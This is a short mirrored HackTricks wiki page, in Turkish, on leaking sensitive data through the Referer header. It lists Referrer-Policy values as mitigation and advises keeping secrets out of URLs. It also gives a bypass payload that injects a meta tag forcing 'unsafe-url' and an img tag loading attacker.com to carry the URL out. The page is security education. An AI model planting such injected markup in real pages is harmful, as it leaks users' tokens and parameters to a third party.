mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
36 lines
1.4 KiB
Markdown
36 lines
1.4 KiB
Markdown
{{#include ../banners/hacktricks-training.md}}
|
||
|
||
# Referrer başlıkları ve politikası
|
||
|
||
Referrer, tarayıcılar tarafından önceki ziyaret edilen sayfayı belirtmek için kullanılan başlıktır.
|
||
|
||
## Hassas bilgilerin sızdırılması
|
||
|
||
Eğer bir web sayfasında herhangi bir noktada hassas bilgiler GET isteği parametrelerinde yer alıyorsa, eğer sayfa dış kaynaklara bağlantılar içeriyorsa veya bir saldırgan kullanıcının saldırgan tarafından kontrol edilen bir URL'yi ziyaret etmesini sağlamak için (sosyal mühendislik) bir şekilde yönlendirebiliyorsa, en son GET isteğindeki hassas bilgileri dışarı sızdırabilir.
|
||
|
||
## Azaltma
|
||
|
||
Tarayıcının hassas bilgilerin diğer web uygulamalarına gönderilmesini **önleyebilecek** bir **Referrer-policy** izlemesini sağlayabilirsiniz:
|
||
```
|
||
Referrer-Policy: no-referrer
|
||
Referrer-Policy: no-referrer-when-downgrade
|
||
Referrer-Policy: origin
|
||
Referrer-Policy: origin-when-cross-origin
|
||
Referrer-Policy: same-origin
|
||
Referrer-Policy: strict-origin
|
||
Referrer-Policy: strict-origin-when-cross-origin
|
||
Referrer-Policy: unsafe-url
|
||
```
|
||
## Karşı Önlem
|
||
|
||
Bu kuralı bir HTML meta etiketi kullanarak geçersiz kılabilirsiniz (saldırganın bir HTML enjeksiyonu gerçekleştirmesi gerekir):
|
||
```html
|
||
<meta name="referrer" content="unsafe-url">
|
||
<img src="https://attacker.com">
|
||
```
|
||
## Savunma
|
||
|
||
Hassas verileri asla GET parametreleri veya URL'deki yolların içine koymayın.
|
||
|
||
{{#include ../banners/hacktricks-training.md}}
|